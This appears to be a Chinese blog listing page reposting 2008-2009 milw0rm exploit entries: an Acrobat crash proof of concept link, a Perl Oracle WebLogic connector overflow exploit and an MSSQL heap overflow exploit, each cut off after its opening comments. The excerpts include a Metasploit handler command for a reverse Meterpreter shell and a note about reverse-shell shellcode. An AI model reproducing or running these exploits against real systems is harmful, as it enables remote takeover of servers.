Acrobat <= 9.1.1 Stack Overflow Crashy PoC

日期: 2009/05/30 分类: 技术杂文 标签: , 添加回复 
Acrobat <= 9.1.1 Stack Overflow Crashy PoC

http://milw0rm.com/sploits/2009-crashy_the_clown.pdf

# milw0rm.com [2009-05-29]

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

日期: 2009/04/03 分类: 技术杂文 标签: , , , , 添加回复

From:milw0rm

#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0 

阅读全文

MS SQL Server sp_replwritetovarbin() Heap Overflow Exploit (0day)

日期: 2008/12/18 分类: 技术杂文 标签: , , 添加回复

From:milw0rm

<html>
<%
// k`sOSe 12/17/2008
// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots :)
//  

阅读全文